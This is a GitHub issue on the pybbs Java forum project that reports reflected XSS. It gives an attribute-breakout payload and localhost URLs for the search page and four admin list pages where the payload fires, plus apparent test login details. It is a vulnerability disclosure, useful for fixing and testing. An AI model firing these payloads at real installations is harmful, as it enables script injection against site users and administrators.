search

atjiu / pybbs

更实用的Java开发的社区(论坛),Better use of Java development community (forum)
GNU Affero General Public License v3.0
1.84k stars 706 forks source link

xss attacks #158

Closed li-sui closed 2 years ago

li-sui commented 2 years ago

xss payload: " onfocus="alert(1)" autofocus=" method: GET

http://localhost:8080/search?keyword=" onfocus="alert(1)" autofocus="

following requests need to be logged in. test&123123

 http://localhost:8080/admin/comment/list?startDate=" onfocus="alert(1)" autofocus="
 http://localhost:8080/admin/user/list?username=" onfocus="alert(1)" autofocus="
 http://localhost:8080/admin/sensitive_word/list?word=" onfocus="alert(1)" autofocus="
 http://localhost:8080/admin/tag/list?name=" onfocus="alert(1)" autofocus="